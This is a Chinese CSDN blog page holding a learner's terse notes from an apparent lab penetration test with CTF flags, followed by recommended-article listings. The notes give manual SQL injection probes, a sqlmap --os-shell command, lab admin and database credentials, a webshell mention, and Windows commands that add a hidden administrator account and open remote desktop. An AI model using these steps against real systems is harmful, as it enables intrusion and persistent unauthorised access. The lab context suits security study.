漏挖的项目实战笔记

最新推荐文章于 2024-07-28 23:46:55 发布
最新推荐文章于 2024-07-28 23:46:55 发布
阅读量244 收藏
点赞数
文章标签: 数据库 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bigbigworld666/article/details/103967130
版权

学习笔记

1.13日

漏洞挖掘及渗透项目实战

留言可以上传?
搜索
思路:
1.网站语言php
2.可能存在sql注入漏洞呢?get方法
3.我想找到后台

判断页面是否存在sql注入的手工判断方法

构造payload的方法如下:
http://192.168.7.49/product.php?cid=3

$cid=get[id];
select * from tables where id=3 or 1=1; = select * from tables;

’ url编码 %27

cid=3’ 异常
cid=3 and 1=1 正常
cid=3 and 1=2 异常

这个地方一定存在sql注入

找到了sql注入漏洞:第一步就是拿数据

information_schema //mysql5.0以上版本。默认存在的一个数据库

510_admin |
| 510_config |
| 510_flag |
| 510_messages |
| 510_newbase |
| 510_newsclass |
| 510_newscontent |
| 510_proclass |
| 510_procut |
| 510_single |
| 510_weblink

管理员的登录账户和密码:
admin
adminlwphp

flag3{d3eac3a68b7d3863cc7bd45ba948195d}

网站的物理路径:
C:/WWW/

sqlmap 功能 --os-shell

这个功能有限,只有在网站权限在root权限时才能有用。

sqlmap.py -u 路径 --os-shell

账户的权限:
guest用户权限
user普通用户权限
administrators管理员权限
system系统权限

guest<user<administrators<system

一句话木马—菜刀—巴西烤肉

flag2{981c05134c56092b83b3e9c9b4116ac1}

whoami //查看当权权限

网站存在sql注入漏洞,我们能够利用注入漏洞拿到系统shell

$mydbuser=“root”;
$mydbpw =“windpasssql”;

添加用户,把用户添加进管理员组,开启3389端口

net user hacker 123456 /add

net localgroup Administrators hacker /add

需要管理员的账户和密码:

net user administrator 123456

b1gW0r1d
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
项目实战笔记
03-04
关于开会大家应该都不陌生,而且应该有不少人被过度频繁的会议“伤过”,甚至”谈会色变“。当一个组织的人员较多,结构复杂时这个问题会更加突出。如果开发人员/测试人员参加会议过多,会导致工作打断严重,直接...
掘的高级方法
weixin_34324081的博客
11-01 927
前言 在此文中我将讲述我在软件掘的实践中学到的技术及方法,不过这些内容并非那些前沿的技术,大多是基础类型的技术及方法。对于初学者而言,希望能够给予入门的指导,对于经验丰富的掘工作者而言,我认为也可以从中获得一些启发。 受限于我个人的知识水平及能力,这篇文章并不可能做到面面俱到,也希望阅读者能够与我积极交流,对于其中的错误不吝赐教。 我将会把...
实战掘一个某公司网站
我只会装360的博客
12-21 3267
作为一个资深安全菜鸟,主要是讲解常规洞的一个流程和思路,以找到的一个某公司sql注入为例,大佬轻喷 网上很多资料及博客都有讲解,通过搜索引擎寻找网站洞,实际上整个洞的过程基本上是撞大运,掏出谷歌,搜索inurl:php?id=,实际上搜索的都是php网站,然后一个个测试。。。作为一个菜鸡也只能这样了 往后面找,一个个测试 这个一看就可能存在sql诸如,开始测试,单引号,and1=1,an...
小白SQL注入基础入门(持续修改)
MSB_WLAQ的博客
10-12 391
1.SQL分类 基于变量数据类型分 数字型注入 字符型注入 '' ' ) ') 搜索型注入 %’ JSON型注入(判断是数字还是字符 考虑要不要闭合 JSON={"XINGMING":"DUMP' and 1=2 union select 1,database(),2 #"} 基于获取数据的方法 基于回显 基于错误 盲注 布尔型盲注 时间盲注 基于注入点位置分类(请求方法) 注入要判断是否有干扰 GET注入 Cookie注入 POST注入(登录框)REQUEST 注入 (全部接受) H
实战纪实 | 实战sql掘技巧
hackzkaq的博客
02-08 1610
更多黑客技能 公众号:暗网黑客 作者:掌控安全学员-黑影 信息收集 首先要知道洞是一个很玄学的事情,为什么呢我也不知道图片… 这里先给大家推荐几个谷歌hack语法用来批量掘sql洞的。 inurl:/search_results.php search= inurl:’Product.asp?BigClassName inurl:Article_Print.asp? inurl:NewsInfo.asp?id= inurl:EnCompHonorBig.asp?id= inurl:NewsInfo
Android项目开发实战笔记.pdf
11-17
Android项目开发实战笔记.pdf
dubbo笔记——项目实战
02-24
存在2个系统,A系统和B系统,A系统调用B系统的接口获取数据,用于查询用户列表。安装zookeeper,解压(zookeeper-3.4.8.tar.gz)得到如下:然后进入conf将zoo_sample.cfg改名成zoo.cfg。并相关如下内容:该目录为...
图数据库查询与操作指南-以Nebula图数据库为例
DZSpace,专注于计算机科学与技术领域的技术博主,致力于分享实用知识与技巧,帮助读者快速掌握技术要点,共同探索计算机世界的无限可能。欢迎访问DZSpace的博客,一起学习进步!
07-26 290
图数据库查询与操作指南-以Nebula图数据库为例
ODBC连接达梦数据库
qq_55187735的博客
07-24 263
用户执行,因为环境变量配置在。
SQL基础入门:解锁数据库管理的钥匙
WayneYalejk的博客
07-26 362
在数字化时代,数据已成为企业最宝贵的资产之一。为了高效地存储、查询和管理这些数据,SQL(Structured Query Language,结构化查询语言)应运而生。SQL不仅是数据库管理员的必备技能,也是数据分析师、开发人员等多个领域从业者的重要工具。本文将带您踏入SQL的世界,从基础概念到实际应用,一步步解锁数据库管理的钥匙。强调SQL在数据处理和分析中的重要性,鼓励读者通过实践不断深化对SQL的理解和应用。
ubuntu20.04服务器搭建mongodb7
glovenone的专栏
07-25 763
ubuntu安装mongodb
CTF-NSSCTF题单[GKCTF2020]
2302_78903258的博客
07-24 1224
在低于7.2.29的PHP版本7.2.x,低于7.3.16的7.3.x和低于7.4.4的7.4.x中,将get_headers()与用户提供的URL一起使用时,如果URL包含零(\ 0)字符,则URL将被静默地截断。访问/eval的路由,会设置一个delay,和你传入的get参数的delay进行比较,取较大的那个,然后setTimeout是延时函数,delay秒后就会执行第一个参数,即next(),否则就会send出timeout。是假的,但是有线索,提示说真正的flag的在。
通过Docker安装KingbaseES V8并激活开发License
weimeilayer的博客
07-24 174
首先,我们可以去KingbaseES的官网(https://www.kingbase.com.cn/xzzx/index.htm ,在软件版本中,注意下载的镜像为x86版本)下载docker镜像,下载完成后导入即可。简单介绍一下在Docker中安装人大金仓(KingbaseES V9)的过程,以及如何更换默认的License为官方提供的365天有效期的开发License。下面的安装过程都是在WSL2中完成的。我们可以通过下面的命令从宿主来直接查看KingbaseES的版本。启动容器,可以直接下面的脚本。
Redis快速入门基础
2301_79693537的博客
07-23 705
llen使用实例,测列表长度。
教务管理平台/高校教务管理系统的设计与实现/教务网站/学生成绩管理系统/学生课程管理系统
weixin_47958760的博客
07-27 424
本毕业设计的内容是设计并且实现一个基于JSP技术的教务管理平台。采用MYSQL为数据库开发平台,SSM框架,Tomcat网络信息服务作为应用服务器。教务管理平台的功能已基本实现,主要有学生、教师、课程信息、课程选择、教师课表、学生成绩、图书信息、考试等管理功能。 论文主要从系统的分析与设计 、数据库设计和系统的详细设计等几个方面来进行论述,系统分析与设计部分主要论述了系统的功能分析、系统的设计思路,数据库设计主要论述了数据库的设计,系统的详细设计部分主要论述了几个主要模块的详细设计过程。
【MySQL进阶之路 | 高级篇】简述Bin Log日志
2301_80912559的博客
07-27 718
binlog即binary log,二进制日志文件,也叫作变更日志(update log)。二进制日志可以通过数据库的全量备份和二进制日志中保存的增量信息,完成数据库的无损失恢复I但是,如果遇到数据量大、数据库和数据表很多(比如分库分表的应用)的场景,用二进制日志进行数据恢复,是很有挑战性的,因为起止位置不容易管理。在这种情况下,一个有效的解决办法是配置主从数据库服务器,甚至是一主多从的架构,把二进制日志文件的内容通过中继日志,同步到从数据库服务器中,这样就可以有效避免数据库故障导致的数据异常等问题。
使用abpcli创建项目时提示数据库迁移失败
最新发布
qq_43893277的博客
07-28 98
使用abpcli创建项目时提示数据库迁移失败!
AOP~面向切面编程介绍
m0_61801450的博客
07-28 584
springboot框架中的AOP操作、日志记录功能的填写。
改进向量搜索-使用PostgresML和LlamaIndex重新排名
大数据杂货铺的博客
07-26 240
但是,它对于重新排序我们数据集的子集非常有效,因为它擅长评估新的、未见过的数据,而无需大量用户交互数据进行微调。在这里,我们将检索器配置为返回排名前两个的文档,但这次,我们添加了一个重新排名参数以使用mixedbread-ai/mxbai-rerank-base-v1模型。这意味着我们的初始语义搜索将返回 100 个结果,然后由mixedbread-ai/mxbai-rerank-base-v1模型对这些结果进行重新排名,并且仅显示排名前两个的结果。设置您的帐户,并将上述示例与您自己的数据一起使用。
springboot项目实战笔记
08-11
SpringBoot项目实战笔记可以按照以下步骤进行: 1. 首先,你可以通过观看B站上的教程视频来学习SpringBoot项目实战。在视频中,你可以学习到如何使用SpringBoot、MyBatis和MySQL创建一个电脑商城项目。 2. 确保你的SpringBoot项目能够成功启动。找到被@SpringBootApplication注解修饰的入口启动类,并运行该类。如果你能够观察到图形化的界面,那么说明你的项目成功启动了。 3. 如果你还没有创建SpringBoot项目,你可以使用Spring Initializr来初始化一个新的项目。Spring Initializr是一个Web应用程序,可以为你生成Spring Boot项目的基本结构。你可以选择使用Maven或Gradle作为构建工具,并添加适合你的项目的依赖。然后,你只需要编写应用程序的代码即可。 希望以上信息对你有帮助!如果还有其他问题,请随时提问。123 #### 引用[.reference_title] - *1* *2* [SpringBoot项目实战笔记:电脑商城项目实战(SpringBoot+MyBatis+MySQL)](https://blog.csdn.net/weixin_44260350/article/details/127746667)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}} ] [.reference_item] - *3* [《SpringBoot实战》读书笔记](https://blog.csdn.net/sanhewuyang/article/details/104494202)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值